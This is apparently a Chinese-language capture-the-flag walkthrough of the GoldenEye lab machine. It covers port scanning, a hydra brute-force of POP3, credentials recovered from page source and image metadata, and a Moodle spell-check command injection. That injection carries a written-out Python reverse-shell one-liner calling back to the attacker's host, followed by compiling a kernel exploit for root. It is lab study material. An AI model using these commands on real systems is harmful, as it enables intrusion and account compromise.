GoldenEye

netdiscover -r 192.168.133.0找到靶机
nmap -p- 192.168.133.220扫描全端口，发现只有几个端口开放

图片.png

访问80端口

图片.png

根据他的提示去/sev-home/路径下，发现是登录的界面,但是并没有账号密码,只能回去继续看默认页面了

F12发现存在一个terminal.js文件,查看文件内容，是吧对应的密码进行html编码了,InvincibleHack3r这个就是对应的密码，然后根据上面的内容,用boris登陆

tiip

登陆成功之后,给了下一个提示,f12查看源代码,发现最底下的注释,提示了用户名

图片.png 图片.png

我们可以知道55006 55007其中一个有可能是pop3端口,使用nc连接55007端口,根据回显消息看到pop3的字样

图片.png

接下来用haydra进行爆破，使用kali自带的密码字典(别问为什么，我也不知道，网上抄的。。。)，命令如下
hydra -s 55007 -L uname.txt -P /usr/share/wordlists/fasttrack.txt -t 64 192.168.133.222 pop3

找到两个用户的账号密码了。

图片.png

接下来利用得到的用户名密码登入系统

图片.png

USER boris（通过该命令输入用户名boris）
PASS secret1! （使用该命令输入用户的密码。之后，我们从目标计算机收到了登陆成功的消息，说明已在目标系统上成功通过了身份验证）
LIST（用于显示目标系统上所有可用的电子邮件）
RETR ID_number (用来查看指定ID的电子邮件)

看到第二封邮件的时候发现给了提示

图片.png

然后修改自己本地的HOSTS文件

图片.png

用刚才邮件中提到的那个账号密码登陆，登进去之后下面显示有发送邮件提示，点进去看看

图片.png

得知了用户名，接着爆破一波？拿到了用户名密码，登陆上去，在主页发现管理员用户名admin,密码不知道

继续点着看看，发现一个TXT文件

图片.png

看到一个路径，看看下载下来是什么，一张jpg图片，作为一个多年的MISC狗第一反应就是看详细信息

图片.png

发现base64的字符串，解码一下看看，结果为xWinter1995x!

可能这就是之前admin用户的密码？？试了一下竟然对了~

图片.png

进去之后发现在编辑的页面发现版本号，求助google了

图片.png

然后发现一个貌似能执行命令的地方,先去编辑器处将默认的改为PSpellShell

图片.png

然后返回之前执行命令那个地方

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.133.206",4433));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

然后需要调用系统的拼写检查，从而让系统执行我们对应的命令

图片.png

已经弹回shell了

图片.png

查看当前权限和内核版本

图片.png

在kali里面搜一波

图片.png

目标机器里面没有gcc，先修改c文件,直接把里面的gcc修改成cc即可

图片.png

补充一下：
cc是Unix的C编译器，全程为c compiler，而gcc为Linux的，全称为GNU compiler collection,是一个编译器集合，既可以编译c也可以编译c++.

用python的简单文件服务器，传到靶机上去
python -m SimpleHTTPServer 8999

然后编译执行一把梭

cc 37292.c -o exp
chmod 777 exp
./exp

图片.png

直接去root家目录读flag

图片.png

最后还有一个彩蛋，优秀

图片.png

---

使用msf提权，简单写写，只是为了试试好不好使

图片.png
图片.png
图片.png